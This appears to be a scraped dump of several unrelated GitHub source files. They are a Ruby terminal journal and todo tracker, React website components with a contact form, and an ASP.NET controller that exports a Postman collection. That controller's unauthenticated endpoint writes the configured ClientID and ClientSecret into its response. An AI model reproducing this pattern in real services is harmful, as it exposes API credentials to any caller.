print "TES"
sleep 0.1
print "\r"
print "TEST"
print "\n"
end
end<file_sep>require 'fileutils'
require 'tempfile'
require 'date'
require './animations'
class Tracker
def setup
unless Dir.exist?("./stash/")
system("mkdir stash")
end
unless Dir.exist?("./todo/")
system("mkdir todo")
end
unless Dir.exist?("./setup/")
system "mkdir setup"
end
end
def startup
system("git pull --quiet")
end
def current_date
DateTime.now.strftime("%-m-%-d-%y")
end
def current_time
DateTime.now.strftime("%R")
end
def today_file
"./stash/#{current_date}.txt"
end
def todo_file
"./todo/#{current_date}.txt"
end
def parse(input)
input.split(" ")[0].to_s
end
def parse_output(input)
input.split(" ")[1..-1].join(" ").to_s
end
def run
prompt = "~> "
print prompt
while (input = gets.chomp)
if input == "exit"
break
elsif input.strip == ""
print prompt
elsif input == "today"
system("cat #{today_file}")
print prompt
elsif input == "todos" || input == "todo"
system("cat #{todo_file}")
print prompt
elsif parse(input) == "todo"
open(todo_file, "a+") do |file|
file << parse_output(input) + "\n"
end
puts "Added \"#{parse_output(input)}\" to today's TODO file."
todo_number_lines
print prompt
elsif parse(input) == "done"
line_number = parse_output(input)
if input.split(" ").size == 2 && is_number?(line_number)
todo_done(line_number)
else
puts "That's not a valid command. To mark a todo as done, just type 'done' and then the number of the todo item."
end
print prompt
elsif input == "open today"
system('subl #{today_file}')
print prompt
else
open(today_file, "a+") do |file|
file << "#{current_time}" + " " + input + "\n"
end
puts "Logged \"#{input}\" at #{current_time} in today's STASH file, #{current_date}.txt"
print prompt
end
end
end
def is_number?(line_number)
line_number = line_number.to_s unless line_number.is_a? String
/\A[+-]?\d+(\.[\d]+)?\z/.match(line_number)
# https://medium.com/launch-school/number-validation-with-regex-ruby-393954e46797
end
def todo_number_lines
temp_file = Tempfile.new('todo_temp.txt')
File.open(todo_file, 'r') do |f|
n = 1
f.each_line{|line|
if is_number?(parse(line).gsub(":",""))
line = line.split(" ")[1..-1].join(" ")
temp_file.puts line.prepend("#{n}: ")
else
temp_file.puts line.prepend("#{n}: ")
end
n += 1
}
end
temp_file.close
FileUtils.mv(temp_file.path, todo_file)
end
def todo_done(line_number)
ln = line_number.to_i
lc = `wc -l "#{todo_file}"`.strip.split(" ")[0].to_i
lna = ln - 1
lnb = line_number.to_s + ":"
if ln > lc
output = "You don't have that many todo's, champ."
else
content = File.open(todo_file).readlines[lna].split(" ")[1..-1].join(" ")
open(today_file, "a+") do |f|
f << "#{current_time}" + " #{content}" + "\n"
end
output = "logged \"#{content}\" from today's todo_file in #{current_date}.txt"
open(todo_file, 'r') do |f|
open('temp_todo_file.txt', 'w') do |f2|
f.each_line do |line|
f2.write(line) unless parse(line) == lnb
end
end
end
FileUtils.mv('temp_todo_file.txt',todo_file)
todo_number_lines
end
puts output
end
def shutdown
puts "Attempting to shut down gracefully and save your work."
if File.exist?(todo_file)
system("git add #{todo_file}")
system('git commit -m "update"')
end
# if File.exist?(today_file)
system("git add #{today_file}")
system('git commit -m "update"')
# end
system("git push")
end
end | bad401fe9109f868f94206c09bf4355f2eb3e6e2 | [
"Ruby"
] | 3 | Ruby | johnsillings/pistachio | e37a9a3b64b2c83ebf96929f6079494ced26aefd | af801b596cf6bc83add948019ce00ed15b872d0f |
refs/heads/master | <file_sep>import React, { Component } from 'react';
import { Switch, Route, BrowserRouter} from 'react-router-dom';
import './App.css';
import NavBar from './components/NavBar';
import Services from './components/Services';
import Contact from './components/Contact';
import Heading from './components/Heading';
import Footer from './components/Footer';
class App extends Component {
render() {
return (
<BrowserRouter>
<div className="App">
<div id="shape1" className="shape1"></div>
<div id="shape2" className="shape2"></div>
<NavBar />
<Heading />
<Services />
<Contact />
<Footer />
</div>
</BrowserRouter>
);
}
}
export default App;
<file_sep>import React, { Component } from 'react';
import { NavLink, Link } from 'react-router-dom';
import '../assets/css/Navigation.css';
import {
Collapse,
NavbarToggler,
Nav,
NavItem,
} from 'reactstrap';
import Logo from './Logo';
class NavBar extends Component {
constructor(props) {
super(props);
this.toggle = this.toggle.bind(this);
this.state = {
isOpen: false
};
}
toggle() {
this.setState({
isOpen: !this.state.isOpen
});
}
render() {
return (
<header id="mainNav">
<nav className="navbar navbar-light navbar-expand-md navigation-clean">
<div className="container">
<Link className="navbar-brand" to='/'><Logo /></Link>
<NavbarToggler onClick={this.toggle} />
<Collapse isOpen={this.state.isOpen} navbar>
<Nav className="nav navbar-nav ml-auto" navbar>
<NavItem>
<NavLink className="nav-link" to='/services'>Services</NavLink>
</NavItem>
<NavItem>
<NavLink className="nav-link" to='/portfolio'>Portfolio</NavLink>
</NavItem>
<NavItem>
<NavLink className="nav-link" to='/blog'>Blog</NavLink>
</NavItem>
<NavItem>
<NavLink className="nav-link" to='/#contact'>Contact</NavLink>
</NavItem>
</Nav>
</Collapse>
</div>
</nav>
</header>
);
}
}
export default NavBar;<file_sep>import React, { Component } from 'react';
import '../assets/css/Contact.css';
const encode = (data) => {
return Object.keys(data)
.map(key => encodeURIComponent(key) + "=" + encodeURIComponent(data[key]))
.join("&");
}
class Contact extends Component {
constructor(props) {
super(props);
this.state = { name: "", email: "", phone:"", message: "" };
}
handleSubmit = e => {
fetch("/", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: encode({ "form-name": "contact", ...this.state })
})
.then(() => alert("Success!"))
.catch(error => alert(error));
e.preventDefault();
};
handleChange = e => this.setState({ [e.target.name]: e.target.value });
render() {
const { name, email, phone, message } = this.state;
return (
<section id="contact" name="contact">
<div className="container">
<div className="row">
<div className="col-lg-12 text-center">
<h2 className="section-heading text-uppercase">Contact Us</h2>
<h3 className="section-subheading text-muted">Lorem ipsum dolor sit amet consectetur.</h3>
</div>
</div>
<div className="row">
<div className="col-lg-12">
<form onSubmit={this.handleSubmit} id="contactForm" name="sentMessage" noValidate>
<div className="row">
<div className="col-md-6">
<div className="form-group">
<input className="form-control" onChange={this.handleChange} id="name" type="text" name="name" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name." />
<p className="help-block text-danger"></p>
</div>
<div className="form-group">
<input className="form-control" onChange={this.handleChange} id="email" type="email" name="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address." />
<p className="help-block text-danger"></p>
</div>
<div className="form-group">
<input className="form-control" onChange={this.handleChange} id="phone" type="tel" name="phone" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number." />
<p className="help-block text-danger"></p>
</div>
</div>
<div className="col-md-6">
<div className="form-group">
<textarea onChange={this.handleChange} className="form-control" id="message" name="message" placeholder="Tell Us More About Your Project *" required="required" data-validation-required-message="Please enter a message."></textarea>
<p className="help-block text-danger"></p>
</div>
</div>
<div className="clearfix"></div>
<div className="col-lg-12 text-center">
<div id="success"></div>
<button id="sendMessageButton" className="btn btn-primary btn-xl text-uppercase mt-3" type="submit">Send Message</button>
</div>
</div>
</form>
</div>
</div>
</div>
</section>
);
}
};
export default Contact; | 3cf1e89295ac6e3fbc02a7db847c51135dd9adb0 | [
"JavaScript"
] | 3 | JavaScript | YannickLeRoux/AzureWebSolutions | 8affc2468ab415f887fad604535b890649e4665f | 01514e1ad5630d77a6c0a356a7f0e9c2912ec675 |
refs/heads/master | <file_sep># PostmanImport
ASP.NET WebApi Postman import format
<file_sep>using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.ApiExplorer;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
namespace PostmanImport.Controllers
{
[Route("postman")]
public class PostmanController : Controller
{
private readonly IApiDescriptionGroupCollectionProvider _apiExplorer;
private readonly IHostingEnvironment _env;
public PostmanController(IApiDescriptionGroupCollectionProvider apiExplorer, IHostingEnvironment environment)
{
_apiExplorer = apiExplorer;
_env = environment;
}
[HttpGet]
public object Postman()
{
string enviroment = _env.IsDevelopment() ? "Development" : _env.IsStaging() ? "DevelopmentStaging" : _env.IsProduction() ? "Production" : "Test";
using (StreamReader envir = new StreamReader($@"{_env.ContentRootPath}\appsettings.{_env.EnvironmentName}.json"))
{
string jsonEnviroment = envir.ReadToEnd();
var postmanEnvironment = JsonConvert.DeserializeObject<Newtonsoft.Json.Linq.JObject>(jsonEnviroment)["PostmanEnvironment"];
using (StreamReader r = new StreamReader($@"{_env.ContentRootPath}\appsettings.json"))
{
string json = r.ReadToEnd();
var postman = JsonConvert.DeserializeObject<Newtonsoft.Json.Linq.JObject>(json)["Postman"];
postman["info"] = Info(postman["info"], postmanEnvironment);
List<string> forAddEnviroment = new List<string>();
postman["item"] = Item(postman["item"], ref forAddEnviroment);
postman["auth"] = Auth(postman["auth"]);
postman["event"] = Event(postman["event"], postmanEnvironment, forAddEnviroment);
return postman;
}
}
}
JToken Info(JToken data, JToken pEnvironment)
{
data["_postman_id"] = Guid.NewGuid().ToString();
data["name"] = $"{_env.ApplicationName} {_env.EnvironmentName} {DateTime.Now.ToShortDateString()}";
data["description"] = pEnvironment["ProjectDescription"];
return data;
}
JToken Item(JToken Folders, ref List<string> forAddEnviroment)
{
var tempFolder = Folders.First.DeepClone();
Folders.First.Remove();
var Conttrolers = _apiExplorer.ApiDescriptionGroups.Items[0].Items.GroupBy(x => x.ActionDescriptor.RouteValues.LastOrDefault()).ToList();
foreach (var actions in Conttrolers)
{
var folder = tempFolder.DeepClone();
#region Folder
folder["name"] = actions.FirstOrDefault().ActionDescriptor.RouteValues.LastOrDefault().Value;
#region Folder Item
foreach (var action in actions)
{
var folderItem = tempFolder["item"].First.DeepClone();
var folderItemRequest = folderItem["request"].DeepClone();
folderItem["name"] = action.RelativePath;
#region Folder Item Request
folderItemRequest["method"] = action.HttpMethod;
folderItemRequest["header"] = new JArray();
((JValue)folderItemRequest["body"].SelectToken("mode")).Value = "raw";
((JValue)folderItemRequest["body"].SelectToken("raw")).Value = "";
((JValue)folderItemRequest["url"].SelectToken("raw")).Value = $"{{ApiPath}}/{action.RelativePath}";
((JArray)folderItemRequest["url"].SelectToken("host")).Add("{{ApiPath}}");
((JArray)folderItemRequest["url"].SelectToken("path")).Add(action.RelativePath);
foreach (var paramerter in action.ParameterDescriptions)
{
if (paramerter.Source.Id != "Body" && paramerter.Source.Id != "Path")
{
if (forAddEnviroment.FirstOrDefault(t => t.Contains(paramerter.Name)) == null)
{
forAddEnviroment.Add(paramerter.Name);
}
((JArray)folderItemRequest["url"].SelectToken("query")).Add(JToken.Parse($@"{{""key"": ""{paramerter.Name}"",""value"": ""{{{{{paramerter.Name}}}}}""}}"));
}
}
#endregion
folderItem["request"] = folderItemRequest;
folderItem["response"] = new JArray();
((JArray)folder["item"]).Add(folderItem.DeepClone());
}
#endregion
folder["description"] = $"Folder for {actions.FirstOrDefault().ActionDescriptor.DisplayName}";
#endregion
((JArray)folder["item"]).First.Remove();
((JArray)Folders).Add(folder.DeepClone());
}
return Folders;
}
JToken Auth(JToken data)
{
return data;
}
JToken Event(JToken data, JToken pEnvironment, List<string> forAddEnviroment)
{
var loginConfig = (JArray)(data[0]["script"].SelectToken("exec")).DeepClone();
((JArray)(data[0]["script"].SelectToken("exec"))).Clear();
//Main Postman Auth Config
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"ApiPath"}"",pm.environment.get(""{"ApiPath"}"") ? pm.environment.get(""{"ApiPath"}"") : ""{pEnvironment["ApiPath"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"AccessTokenURL"}"",pm.environment.get(""{"AccessTokenURL"}"") ? pm.environment.get(""{"AccessTokenURL"}"") : ""{pEnvironment["AccessTokenURL"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"ClientID"}"",pm.environment.get(""{"ClientID"}"") ? pm.environment.get(""{"ClientID"}"") : ""{pEnvironment["ClientID"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"ClientSecret"}"",pm.environment.get(""{"ClientSecret"}"") ? pm.environment.get(""{"ClientSecret"}"") : ""{pEnvironment["ClientSecret"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"Scope"}"",pm.environment.get(""{"Scope"}"") ? pm.environment.get(""{"Scope"}"") : ""{pEnvironment["Scope"]}"");");
//Query Enviroment Data
foreach (var item in forAddEnviroment)
{
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{item}"",pm.environment.get(""{item}"") ? pm.environment.get(""{item}"") : '');");
}
//Auto Update Auth Info Code
foreach (var item in loginConfig)
{
((JArray)(data[0]["script"].SelectToken("exec"))).Add(((JValue)item).Value);
((JArray)(data[0]["script"].SelectToken("exec")))[((JArray)(data[0]["script"].SelectToken("exec"))).Count - 1] = item;
}
return data;
}
}
}
| 4255864dcf9c2fe5a56c3be9ff7f30f5ac556bce | [
"Markdown",
"C#"
] | 2 | Markdown | mahmudarslan/PostmanImport | c902e4c7bbf5bdac283a2bbf8c85c1579d19971a | 4377c72b65a2e0a00257527a2892accb7b56b90e |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.